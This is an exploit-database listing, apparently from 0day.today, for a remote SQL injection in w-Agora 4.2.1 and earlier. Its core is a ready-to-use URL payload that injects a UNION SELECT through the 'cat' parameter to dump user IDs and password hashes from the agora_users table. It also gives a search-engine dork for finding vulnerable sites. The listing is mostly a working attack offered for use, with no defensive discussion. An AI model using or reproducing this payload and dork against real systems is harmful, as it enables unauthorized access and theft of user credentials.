[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability

Author
IHTeam
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2428
Category
web applications
Date add
30-12-2007
Platform
unsorted
=========================================================
w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability
=========================================================



#########################################################################################
#
#         [W-Agora <= 4.2.1]
#
# Class:     SQL Injection  
# Found:     30/12/2007 
# Remote:    Yes  
# Site:      http://w-agora.net
# Author:    R00T[ATI]
#   #########################################################################################

        Exploit :
===================================================================================================================================================================================================================
http://site.com/[w-agora_path]/index.php?site=[site_name]&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
===================================================================================================================================================================================================================


        Thanks To:
=========================
All ihteam.net members;
=========================

DORK: allinurl:"index.php?site=" "W-Agora"



#  0day.today [2024-07-05]  #